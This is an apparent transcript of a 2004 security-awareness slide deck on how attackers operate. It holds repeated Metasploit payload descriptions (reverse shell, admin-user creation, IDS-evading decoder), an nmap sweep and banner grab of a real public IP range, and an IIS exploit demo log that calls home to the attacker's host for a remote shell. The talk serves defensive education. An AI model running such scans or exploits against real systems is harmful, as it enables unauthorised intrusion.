Download presentation
Presentation is loading. Please wait.
1
Security-Assessment.com Copyright Security-Assessment.com 2004 A Day in the Life of a Hacker by Brett Moore
2
Security-Assessment.com Copyright Security-Assessment.com 2004 Hacker, Cracker, Black Hat, Script Kiddie, Warez Pirate, Disgruntled employee, Ex employee, Dishonest employee, Temporary employee, After hours cleaner, Etc etc.. “A hacker by any name, still hacks” opportunist VS motivated
3
Security-Assessment.com Copyright Security-Assessment.com 2004
5
The Metasploit Project Last Update: 02/21/2004 Sections - Metasploit - Shellcode - Opcode DB - Projects - Releases - Research - Contact - Links The Shellcode Archive contains various payloads written by the Metasploit staff. All payloads come with source code and usage instructions. Many of the techniques (and some code) have been borrowed from other sources, credit is given where applicable. Almost none of the code here has been optimized for size, usually there is no need for it, and when there is, it makes more sense to rewrite it from scratch. Effort has been placed into writing payloads that not only work reliably under most environments, but also clean up after themselves when the target goal is achieved. Win32 Vampiric Import Example Many win32 operating systems include a large amount of libraries and executables which are static across service packs. These files can be used to write really small service-pack independent payloads. The example below attaches to dbmssocn.dll and uses the import address table to download and execute a secondary payload. Assembled Size: 179 bytes - Windows 2000 Vampiric Import ASM - Windows 2000 Vampiric Import C - Windows 2000 Vampiric Import Perl - Windows 2000 Vampiric Import Exe MD5 (30053a85bf2f57a8c8ac93f30ae10596) Win32 OS/SP Independent Loader This code uses the kernel32.dll locating technique described by LSD in their "Win32 Assembly Components" paper. Our implementation is based off code by Dino Dai Zovi, with minor changes to remove the need for any calls to GetProcAddress (all functions are found solely by their hash) and to provide a C function to obtain the hash value for a given string. The majority of the win32 payloads on this site use this loader. - Win32 OS/SP Independent Loader C [Visual Studio] Win32 Bind Shell This payload will load winsock, listen on a port, and spawn a cmd.exe shell when a connection is made. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. Assembled Size: 356 bytes - Win32 Bind Shell ASM - Win32 Bind Shell C - Win32 Bind Shell Perl - Win32 Bind Shell Exe MD5 (7995b0f4b8ab2f0ee2166ee51ae2048f) Win32 Reverse Shell This payload will load winsock, connect to the specified host, and spawn a cmd.exe shell. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. A newer, much smaller version of this payload will be released soon. Assembled Size: 335 bytes - Win32 Reverse Shell ASM - Win32 Reverse Shell C - Win32 Reverse Shell Exe MD5 (323b372de2ee3998a9d0ee4e33184279) Win32 Create Local Admin User This payload will load netapi32.dll and call NetUserAdd followed by NetLocalGroupAddMembers. It will create a new user account with the username and password of "X" and add it to the local group "Administrators". This payload has been tested against Windows 2000 and Windows XP, it will not work on Windows 9x systems. Assembled Size: 304 bytes - Win32 Add User ASM - Win32 Add User C - Win32 Add User Exe MD5 (bbc784fe965163b21cfac8f5a38eabcb) Win32 Exception Handle Example This payload demonstrates the use of the Windows exception handling system. Essentially it overwrites the SEH chain at fs:[0] and then triggers an exception through a null pointer dereference, jumping to the code we specify. This technique becomes very useful when writing exploits for bugs which only allow for a small number of bytes to be overwritten. - Win32 Exception Handler ASM x86 FNSTENV XOR Byte Decoder This encoder uses the fnstenv instruction to save the floating point environment to the stack, where it pulls the original eip value and then decodes the real payload. This technique was first described by noir on the vuln-dev mailing list. The actual encoder can only handle 256 bytes in its current form, if more than 256 bytes are needed, change the sub cl to sub cx. The nice thing about this decoder is that it is small (23 bytes) and does not use the jmp/call track to get the eip value, this may prevent certain signature matching intrusion detection systems from detecting the payload. - FNSTENV Xor Decoder ASMMetasploitShellcodeOpcode DBProjectsReleasesResearchContactLinksWindows 2000 Vampiric Import ASMWindows 2000 Vampiric Import CWindows 2000 Vampiric Import PerlWindows 2000 Vampiric Import ExeLSDWin32 OS/SP Independent Loader C [Visual Studio]Win32 Bind Shell ASMWin32 Bind Shell CWin32 Bind Shell PerlWin32 Bind Shell ExeWin32 Reverse Shell ASMWin32 Reverse Shell CWin32 Reverse Shell ExeWin32 Add User ASMWin32 Add User CWin32 Add User ExeWin32 Exception Handler ASMFNSTENV Xor Decoder ASM © 2004 METASPLOIT.COM "I saw this discovery channel show the other day, about this lady who trained rats to run cat5 cable, apparently it works pretty good. So i could have this robot, that unleashes an army of augmented rats..." DL
6
The Metasploit Project Last Update: 02/21/2004 Sections - Metasploit - Shellcode - Opcode DB - Projects - Releases - Research - Contact - Links The Shellcode Archive contains various payloads written by the Metasploit staff. All payloads come with source code and usage instructions. Many of the techniques (and some code) have been borrowed from other sources, credit is given where applicable. Almost none of the code here has been optimized for size, usually there is no need for it, and when there is, it makes more sense to rewrite it from scratch. Effort has been placed into writing payloads that not only work reliably under most environments, but also clean up after themselves when the target goal is achieved. Win32 Vampiric Import Example Many win32 operating systems include a large amount of libraries and executables which are static across service packs. These files can be used to write really small service-pack independent payloads. The example below attaches to dbmssocn.dll and uses the import address table to download and execute a secondary payload. Assembled Size: 179 bytes - Windows 2000 Vampiric Import ASM - Windows 2000 Vampiric Import C - Windows 2000 Vampiric Import Perl - Windows 2000 Vampiric Import Exe MD5 (30053a85bf2f57a8c8ac93f30ae10596) Win32 OS/SP Independent Loader This code uses the kernel32.dll locating technique described by LSD in their "Win32 Assembly Components" paper. Our implementation is based off code by Dino Dai Zovi, with minor changes to remove the need for any calls to GetProcAddress (all functions are found solely by their hash) and to provide a C function to obtain the hash value for a given string. The majority of the win32 payloads on this site use this loader. - Win32 OS/SP Independent Loader C [Visual Studio] Win32 Bind Shell This payload will load winsock, listen on a port, and spawn a cmd.exe shell when a connection is made. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. Assembled Size: 356 bytes - Win32 Bind Shell ASM - Win32 Bind Shell C - Win32 Bind Shell Perl - Win32 Bind Shell Exe MD5 (7995b0f4b8ab2f0ee2166ee51ae2048f) Win32 Reverse Shell This payload will load winsock, connect to the specified host, and spawn a cmd.exe shell. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. A newer, much smaller version of this payload will be released soon. Assembled Size: 335 bytes - Win32 Reverse Shell ASM - Win32 Reverse Shell C - Win32 Reverse Shell Exe MD5 (323b372de2ee3998a9d0ee4e33184279) Win32 Create Local Admin User This payload will load netapi32.dll and call NetUserAdd followed by NetLocalGroupAddMembers. It will create a new user account with the username and password of "X" and add it to the local group "Administrators". This payload has been tested against Windows 2000 and Windows XP, it will not work on Windows 9x systems. Assembled Size: 304 bytes - Win32 Add User ASM - Win32 Add User C - Win32 Add User Exe MD5 (bbc784fe965163b21cfac8f5a38eabcb) Win32 Exception Handle Example This payload demonstrates the use of the Windows exception handling system. Essentially it overwrites the SEH chain at fs:[0] and then triggers an exception through a null pointer dereference, jumping to the code we specify. This technique becomes very useful when writing exploits for bugs which only allow for a small number of bytes to be overwritten. - Win32 Exception Handler ASM x86 FNSTENV XOR Byte Decoder This encoder uses the fnstenv instruction to save the floating point environment to the stack, where it pulls the original eip value and then decodes the real payload. This technique was first described by noir on the vuln-dev mailing list. The actual encoder can only handle 256 bytes in its current form, if more than 256 bytes are needed, change the sub cl to sub cx. The nice thing about this decoder is that it is small (23 bytes) and does not use the jmp/call track to get the eip value, this may prevent certain signature matching intrusion detection systems from detecting the payload. - FNSTENV Xor Decoder ASMMetasploitShellcodeOpcode DBProjectsReleasesResearchContactLinksWindows 2000 Vampiric Import ASMWindows 2000 Vampiric Import CWindows 2000 Vampiric Import PerlWindows 2000 Vampiric Import ExeLSDWin32 OS/SP Independent Loader C [Visual Studio]Win32 Bind Shell ASMWin32 Bind Shell CWin32 Bind Shell PerlWin32 Bind Shell ExeWin32 Reverse Shell ASMWin32 Reverse Shell CWin32 Reverse Shell ExeWin32 Add User ASMWin32 Add User CWin32 Add User ExeWin32 Exception Handler ASMFNSTENV Xor Decoder ASM © 2004 METASPLOIT.COM "I saw this discovery channel show the other day, about this lady who trained rats to run cat5 cable, apparently it works pretty good. So i could have this robot, that unleashes an army of augmented rats..." DL
7
The Metasploit Project Last Update: 02/21/2004 Sections - Metasploit - Shellcode - Opcode DB - Projects - Releases - Research - Contact - Links The Shellcode Archive contains various payloads written by the Metasploit staff. All payloads come with source code and usage instructions. Many of the techniques (and some code) have been borrowed from other sources, credit is given where applicable. Almost none of the code here has been optimized for size, usually there is no need for it, and when there is, it makes more sense to rewrite it from scratch. Effort has been placed into writing payloads that not only work reliably under most environments, but also clean up after themselves when the target goal is achieved. Win32 Vampiric Import Example Many win32 operating systems include a large amount of libraries and executables which are static across service packs. These files can be used to write really small service-pack independent payloads. The example below attaches to dbmssocn.dll and uses the import address table to download and execute a secondary payload. Assembled Size: 179 bytes - Windows 2000 Vampiric Import ASM - Windows 2000 Vampiric Import C - Windows 2000 Vampiric Import Perl - Windows 2000 Vampiric Import Exe MD5 (30053a85bf2f57a8c8ac93f30ae10596) Win32 OS/SP Independent Loader This code uses the kernel32.dll locating technique described by LSD in their "Win32 Assembly Components" paper. Our implementation is based off code by Dino Dai Zovi, with minor changes to remove the need for any calls to GetProcAddress (all functions are found solely by their hash) and to provide a C function to obtain the hash value for a given string. The majority of the win32 payloads on this site use this loader. - Win32 OS/SP Independent Loader C [Visual Studio] Win32 Bind Shell This payload will load winsock, listen on a port, and spawn a cmd.exe shell when a connection is made. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. Assembled Size: 356 bytes - Win32 Bind Shell ASM - Win32 Bind Shell C - Win32 Bind Shell Perl - Win32 Bind Shell Exe MD5 (7995b0f4b8ab2f0ee2166ee51ae2048f) Win32 Reverse Shell This payload will load winsock, connect to the specified host, and spawn a cmd.exe shell. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. A newer, much smaller version of this payload will be released soon. Assembled Size: 335 bytes - Win32 Reverse Shell ASM - Win32 Reverse Shell C - Win32 Reverse Shell Exe MD5 (323b372de2ee3998a9d0ee4e33184279) Win32 Create Local Admin User This payload will load netapi32.dll and call NetUserAdd followed by NetLocalGroupAddMembers. It will create a new user account with the username and password of "X" and add it to the local group "Administrators". This payload has been tested against Windows 2000 and Windows XP, it will not work on Windows 9x systems. Assembled Size: 304 bytes - Win32 Add User ASM - Win32 Add User C - Win32 Add User Exe MD5 (bbc784fe965163b21cfac8f5a38eabcb) Win32 Exception Handle Example This payload demonstrates the use of the Windows exception handling system. Essentially it overwrites the SEH chain at fs:[0] and then triggers an exception through a null pointer dereference, jumping to the code we specify. This technique becomes very useful when writing exploits for bugs which only allow for a small number of bytes to be overwritten. - Win32 Exception Handler ASM x86 FNSTENV XOR Byte Decoder This encoder uses the fnstenv instruction to save the floating point environment to the stack, where it pulls the original eip value and then decodes the real payload. This technique was first described by noir on the vuln-dev mailing list. The actual encoder can only handle 256 bytes in its current form, if more than 256 bytes are needed, change the sub cl to sub cx. The nice thing about this decoder is that it is small (23 bytes) and does not use the jmp/call track to get the eip value, this may prevent certain signature matching intrusion detection systems from detecting the payload. - FNSTENV Xor Decoder ASMMetasploitShellcodeOpcode DBProjectsReleasesResearchContactLinksWindows 2000 Vampiric Import ASMWindows 2000 Vampiric Import CWindows 2000 Vampiric Import PerlWindows 2000 Vampiric Import ExeLSDWin32 OS/SP Independent Loader C [Visual Studio]Win32 Bind Shell ASMWin32 Bind Shell CWin32 Bind Shell PerlWin32 Bind Shell ExeWin32 Reverse Shell ASMWin32 Reverse Shell CWin32 Reverse Shell ExeWin32 Add User ASMWin32 Add User CWin32 Add User ExeWin32 Exception Handler ASMFNSTENV Xor Decoder ASM © 2004 METASPLOIT.COM "I saw this discovery channel show the other day, about this lady who trained rats to run cat5 cable, apparently it works pretty good. So i could have this robot, that unleashes an army of augmented rats..." DL
10
Security-Assessment.com Copyright Security-Assessment.com 2004 Hacker Of Opportunity Low hanging fruit Exploitable by known vulnerabilities After peer recognition Web page defacement
12
-bash-2.05b$ nmap -sP 210.55.24.* Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-03-27 22:54 NZST Host e1-0.core5.akl.iconz.net.nz (210.55.24.1) appears to be up. Host nemo.blackpepper.co.nz (210.55.24.3) appears to be up. Host stream.blackpepper.co.nz (210.55.24.4) appears to be up. Host blackpepper.co.nz (210.55.24.6) appears to be up. Host ns1.visp.co.nz (210.55.24.8) appears to be up. Host vorash.visp.co.nz (210.55.24.9) appears to be up. Host ns2.visp.co.nz (210.55.24.14) appears to be up. Host tollan.visp.co.nz (210.55.24.15) appears to be up. Host webmail.visp.co.nz (210.55.24.17) appears to be up. Host sql.visp.co.nz (210.55.24.18) appears to be up. Host mail.visp.co.nz (210.55.24.20) appears to be up. Host kagan.visp.co.nz (210.55.24.22) appears to be up. Host visp.co.nz (210.55.24.24) appears to be up. Host signup.visp.co.nz (210.55.24.25) appears to be up. Host help.visp.co.nz (210.55.24.26) appears to be up. Host csr.visp.co.nz (210.55.24.27) appears to be up. Host 210.55.24.28 appears to be up. Host reg.visp.co.nz (210.55.24.29) appears to be up. Host jackal.visp.co.nz (210.55.24.30) appears to be up. Host datavisiondirect.co.nz (210.55.24.31) appears to be up. Host roverland.co.nz (210.55.24.32) appears to be up. Host flyingstart.co.nz (210.55.24.33) appears to be up. Host 210.55.24.34 appears to be up. Host 210.55.24.35 appears to be up. Host 210.55.24.36 appears to be up. Host kiwielectronics.co.nz (210.55.24.37) appears to be up. Host 210.55.24.38 appears to be up. Host 210.55.24.39 appears to be up. Host 210.55.24.40 appears to be up. Host 210.55.24.41 appears to be up. Host 210.55.24.42 appears to be up. Host 210.55.24.43 appears to be up. Host 210.55.24.44 appears to be up. Host 210.55.24.45 appears to be up. Host 210.55.24.46 appears to be up. Host 210.55.24.47 appears to be up. Host 210.55.24.48 appears to be up. Host 210.55.24.49 appears to be up. Host savage.visp.co.nz (210.55.24.50) appears to be up. Host squid.visp.co.nz (210.55.24.51) appears to be up. Host johnatwork.visp.co.nz (210.55.24.52) appears to be up. Host 210.55.24.53 appears to be up. Host arwen.visp.co.nz (210.55.24.54) appears to be up. Host 210.55.24.55 appears to be up. Host 210.55.24.57 appears to be up. Host 210.55.24.58 appears to be up. Host 210.55.24.59 appears to be up. Host 210.55.24.60 appears to be up. Host 210.55.24.61 appears to be up. Host 210.55.24.62 appears to be up. Host 210.55.24.63 appears to be up. Host 210.55.24.64 appears to be up. Host 210.55.24.65 appears to be up. Host visp.co.nz (210.55.24.66) appears to be up. Host 210.55.24.67 appears to be up. Host 210.55.24.68 appears to be up. Host 210.55.24.69 appears to be up. Host 210.55.24.70 appears to be up. Host webhost.visp.co.nz (210.55.24.80) appears to be up. Host 210.55.24.81 appears to be up. Host 210.55.24.82 appears to be up. Host 210.55.24.83 appears to be up. Host 210.55.24.84 appears to be up. Host 210.55.24.85 appears to be up. Host 210.55.24.86 appears to be up. Host rfgate.visp.co.nz (210.55.24.100) appears to be up. Host 210.55.24.105 appears to be up. Host 210.55.24.111 appears to be up. Host dallimore.co.nz (210.55.24.112) appears to be up. Host 210.55.24.113 appears to be up. Host 210.55.24.114 appears to be up. Host 210.55.24.115 appears to be up. Host 210.55.24.116 appears to be up. Host 210.55.24.120 appears to be up. Host 210.55.24.121 appears to be up. Host 210.55.24.122 appears to be up. Host 210.55.24.123 appears to be up. Host 210.55.24.124 appears to be up. Host 210.55.24.125 appears to be up. Host 210.55.24.150 appears to be up. Host 210.55.24.151 appears to be up. Host banking.visp.co.nz (210.55.24.152) appears to be up. Host reg.coolnet.co.nz (210.55.24.153) appears to be up. Host 210.55.24.177 appears to be up. Host www.whoosh.co.nz (210.55.24.178) appears to be up. Host www.whoosh.com.au (210.55.24.179) appears to be up. Host worksol.worksolutions.com.au (210.55.24.180) appears to be up. Host 210.55.24.181 appears to be up. Host 210.55.24.182 appears to be up. Host 210.55.24.183 appears to be up. Host mail.chameleon.net.nz (210.55.24.184) appears to be up. Host www.chameleon.net.nz (210.55.24.185) appears to be up. Host 210.55.24.189 appears to be up. Host 210.55.24.193 appears to be up. Host 210.55.24.199 appears to be up. Host stimpy.blackpepper.co.nz (210.55.24.201) appears to be up. Host visp.co.nz (210.55.24.202) appears to be up. Host 210.55.24.203 appears to be up. Host 210.55.24.205 appears to be up. Host 210.55.24.206 appears to be up. Host 210.55.24.234 appears to be up. Host 210.55.24.250 appears to be up. Nmap run completed -- 256 IP addresses (102 hosts up) scanned in 5.206 seconds -bash-2.05b$ % Advanced port ping only % Using raw request timeout: 7 secs % Scanning 192.168.1.* (254 ips) % 4 servers found, 10 seconds 192.168.1.68[OPEN] 192.168.1.252[closed] 192.168.1.253[closed] 192.168.1.254[OPEN] % 2 open, 2 closed, 0 filtered % 4 responses shown, 10 seconds % Using raw request timeout: 7 secs % Scanning 210.55.24.* (254 ips) % 69 servers found, 10 seconds 210.55.24.4Server: Apache/2.0.48 (Unix) mod_ssl/2.0.48 OpenSSL/0.9.7b PHP/4.3.4 210.55.24.17Server: Apache/1.3.17 (Unix) PHP/4.0.4 mod_ssl/2.8.0 OpenSSL/0.9.6 210.55.24.29Server: Microsoft-IIS/4.0 210.55.24.36Server: Microsoft-IIS/4.0 210.55.24.37Server: Microsoft-IIS/4.0 210.55.24.28Server: Microsoft-IIS/4.0 210.55.24.32Server: Microsoft-IIS/4.0 210.55.24.6Server: Apache/2.0.48 (Unix) mod_ssl/2.0.48 OpenSSL/0.9.7b PHP/4.3.4 210.55.24.31Server: Microsoft-IIS/4.0 210.55.24.38Server: Microsoft-IIS/4.0 210.55.24.39Server: Microsoft-IIS/4.0 210.55.24.3Server: Apache/2.0.48 (Unix) mod_ssl/2.0.48 OpenSSL/0.9.7b PHP/4.3.4 210.55.24.15Server: Apache/1.3.26 (Unix) PHP/4.2.1 210.55.24.26Server: Microsoft-IIS/4.0 210.55.24.24Server: Microsoft-IIS/4.0 210.55.24.40Server: Microsoft-IIS/4.0 210.55.24.41Server: Microsoft-IIS/4.0 210.55.24.42Server: Microsoft-IIS/4.0 210.55.24.48Server: Microsoft-IIS/4.0 210.55.24.53Server: Microsoft-IIS/4.0 210.55.24.59Server: Microsoft-IIS/4.0 210.55.24.60Server: Microsoft-IIS/4.0 210.55.24.65Server: Microsoft-IIS/4.0 210.55.24.66Server: Microsoft-IIS/4.0 210.55.24.64Server: Microsoft-IIS/4.0 210.55.24.57Server: Microsoft-IIS/4.0 210.55.24.54Server: Microsoft-IIS/4.0 210.55.24.61Server: Microsoft-IIS/4.0 210.55.24.43Server: Microsoft-IIS/4.0 210.55.24.47Server: Microsoft-IIS/4.0 210.55.24.80Server: Microsoft-IIS/5.0 210.55.24.81Server: Microsoft-IIS/5.0 210.55.24.82Server: Microsoft-IIS/5.0 210.55.24.83Server: Microsoft-IIS/5.0 210.55.24.84Server: Microsoft-IIS/5.0 210.55.24.85Server: Microsoft-IIS/5.0 210.55.24.105Server: Microsoft-IIS/5.0 210.55.24.111Server: Microsoft-IIS/5.0 210.55.24.112Server: Microsoft-IIS/5.0 210.55.24.113Server: Microsoft-IIS/5.0 210.55.24.114Server: Microsoft-IIS/5.0 210.55.24.115Server: Microsoft-IIS/5.0 210.55.24.116Server: Microsoft-IIS/5.0 210.55.24.120Server: Microsoft-IIS/5.0 210.55.24.86Server: Microsoft-IIS/5.0 210.55.24.121Server: Microsoft-IIS/5.0 210.55.24.122Server: Microsoft-IIS/5.0 210.55.24.123Server: Microsoft-IIS/5.0 210.55.24.124Server: Microsoft-IIS/5.0 210.55.24.125Server: Microsoft-IIS/5.0 210.55.24.153Server: Microsoft-IIS/4.0 210.55.24.178Server: Microsoft-IIS/4.0 210.55.24.180Server: Microsoft-IIS/4.0 210.55.24.182Server: Apache/2.0.48 (Unix) mod_ssl/2.0.48 OpenSSL/0.9.7b DAV/2 mod_jk2/2.0.3-dev PHP/4.3.4 210.55.24.181Server: UserLand Frontier/8.0.5-MacOSX 210.55.24.184Server: Apache/1.3.28 (Unix) PHP/4.3.2 210.55.24.185Server: Apache/1.3.28 (Unix) PHP/4.3.2 210.55.24.201Server: Microsoft-IIS/5.0 210.55.24.205Server: Apache/2.0.48 (Unix) mod_ssl/2.0.48 OpenSSL/0.9.7b DAV/2 mod_jk2/2.0.3-dev PHP/4.3.4 210.55.24.179Server: Microsoft-IIS/4.0 210.55.24.234Server: Microsoft-IIS/5.0 210.55.24.206Server: Microsoft-IIS/5.0 210.55.24.42Server: Microsoft-IIS/4.0 210.55.24.43Server: Microsoft-IIS/4.0 210.55.24.53Server: Microsoft-IIS/4.0 210.55.24.54Server: Microsoft-IIS/4.0 210.55.24.123Server: Microsoft-IIS/5.0 210.55.24.153Server: Microsoft-IIS/4.0 210.55.24.28Server: Microsoft-IIS/4.0 % 69 responses shown, 30 seconds SYSTEMX:>tmp/tools/> Scanner –p80 192.168.1.1 – 192.168.1.254
13
Security-Assessment.com Copyright Security-Assessment.com 2004 Hacker Of Opportunity Constantly scanning the Internet Vast log files of computers Distance is no protection New Zealand is no safer than elsewhere
14
Security-Assessment.com Copyright Security-Assessment.com 2004 DEMO 1 : Exploiting a known vulnerability
17
E:\exploits>checkmedia 192.168.1.68 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sat, 27 Mar 2004 11:13:30 GMT Content-Type: text/html NetShow ISAPI Log Dll NetShow ISAPI Log Dll E:\exploits>nsiislog ** IISNSLOG.DLL - Windows Media Services - Remote Shell ** ** Tested Against Service Pack 4 ** Usage: nsiislog ip [ourip] [ourport] E:\exploits>nsiislog 192.168.1.68 ** IISNSLOG.DLL - Windows Media Services - Remote Shell ** ** Tested Against Service Pack 4 **. Calling Home: blackhole:2000. Preparing Exploit Buffer...…Ready. Starting Listener On Port: 2000. Connecting To 192.168.1.68. Sending Exploit......Exploit Sent. Connection Received Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>\whoami IWAM_BLACKHOLE C:\WINNT\system32>
![E:\exploits>checkmedia HTTP/ OK Server: Microsoft-IIS/5.0 Date: Sat, 27 Mar :13:30 GMT Content-Type: text/html NetShow ISAPI Log Dll NetShow ISAPI Log Dll E:\exploits>nsiislog ** IISNSLOG.DLL - Windows Media Services - Remote Shell ** ** Tested Against Service Pack 4 ** Usage: nsiislog ip [ourip] [ourport] E:\exploits>nsiislog ** IISNSLOG.DLL - Windows Media Services - Remote Shell ** ** Tested Against Service Pack 4 **.](http://images.slideplayer.com/20/6226757/slides/slide_17.jpg "Calling Home: blackhole:2000. Preparing Exploit Buffer...…Ready. Starting Listener On Port: Connecting To Sending Exploit......Exploit Sent. Connection Received Microsoft Windows 2000 [Version ] (C) Copyright Microsoft Corp. C:\WINNT\system32>\whoami IWAM_BLACKHOLE C:\WINNT\system32>.")
18
Security-Assessment.com Copyright Security-Assessment.com 2004 Prevention Be aware of the problems and stay current with patches Subscribe to vendor security mailing lists Be alert to large increases in bandwidth The large amount of bogus traffic on the Internet, makes logs less useful
20
Security-Assessment.com Copyright Security-Assessment.com 2004 Hacker Of Motive Revenge Private information Take their time Information discovery Whois, nslookup, mail headers
21
Security-Assessment.com Copyright Security-Assessment.com 2004
22
Security-Assessment.com Copyright Security-Assessment.com 2004 >nslookup acme.co.nz Server: UnKnown Address: 192.168.1.254 Non-authoritative answer: Name: acme.co.nz Address: 192.168.1.1 >nslookup www.acme.co.nz Server: UnKnown Address: 192.168.1.254 Non-authoritative answer: Name: www.acme.co.nz Address: 192.168.1.1 >nslookup mail.acme.co.nz Server: UnKnown Address: 192.168.1.254 Non-authoritative answer: Name: mail.acme.co.nz Address: 192.168.1.68 >nslookup Default Server: UnKnown Address: 192.168.1.254 > set type=any > acme.co.nz Server: UnKnown Address: 192.168.1.254 Non-authoritative answer: acme.co.nz MX preference = 5, mail exchanger = mail.acme.co.nz acme.co.nz internet address = 192.168.1.1 acme.co.nz primary name server = ns.blackhole responsible mail addr = mail.blackhole.co.nz serial = 3012820 refresh = 86400 (1 day) retry = 7200 (2 hours) expire = 3600000 (41 days 16 hours) default TTL = 28800 (8 hours) acme.co.nz nameserver = ns.blackhole acme.co.nz nameserver = ns.blackhole mail.acme.co.nz internet address = 192.168.1.68
23
Security-Assessment.com Copyright Security-Assessment.com 2004
24
Security-Assessment.com Copyright Security-Assessment.com 2004 Hacker Of Motive Easy access through an email trojan The Staff@home attackStaff@home The Staff@work attackStaff@work
25
Security-Assessment.com Copyright Security-Assessment.com 2004 Hacker Of Motive Will replicate the target environment Discover new vulnerabilities Create new exploits New exploits pass through IDS rules
26
Security-Assessment.com Copyright Security-Assessment.com 2004 DEMO 2 : Exploiting an unknown vulnerability
27
Security-Assessment.com Copyright Security-Assessment.com 2004
29
Security-Assessment.com Copyright Security-Assessment.com 2004
30
Security-Assessment.com Copyright Security-Assessment.com 2004 Firewalls No Firewall, Attackers connection allowed Firewall blocks connection. Attacker uses connect back shell Firewall blocks connect and connect back. Attacker uses socket reuse shell
31
Security-Assessment.com Copyright Security-Assessment.com 2004 Prevention Virus scanners Intrusion Detection Systems Firewalls Ensure strong passwords and adequate firewall rules are enforced.
32
Security-Assessment.com Copyright Security-Assessment.com 2004 Prevention Internal IDS Educated staff Forensic response ability, Tripwire Intelligent Log analysis
33
Security-Assessment.com Copyright Security-Assessment.com 2004 Presentation Slides Available For Download From: http://www.security-assessment.com
34
Security-Assessment.com Copyright Security-Assessment.com 2004 NEWS LINKS Police called after National Party website hacked http://www.nzherald.co.nz/latestnewsstory.cfm?storyID=3554851&thesection=news&thesubsection=general Local hacker faces big bill http://www.nzherald.co.nz/storydisplay.cfm?storyID=3555542&thesection=technology&thesubsection=general Kiwis 'have weakness for internet scams‘ http://www.stuff.co.nz/stuff/0,2106,2811488a28,00.html Australian hacker activity on the rise http://www.zdnet.com.au/news/security/0,2000061744,39116594,00.htm NZ Police lay first charge for hacking http://www.stuff.co.nz/stuff/0,2106,2845353a6022,00.html UK teen escapes jail in nuclear lab hack case http://www.theregister.co.uk/content/55/35280.html Hackers exploit Windows patches http://news.bbc.co.uk/1/hi/technology/3485972.stm A peek at script kiddie culture http://software.newsforge.com/software/04/02/28/0130209.shtml Hacking insurance is a must http://www.vnunet.com/News/1153579
Similar presentations
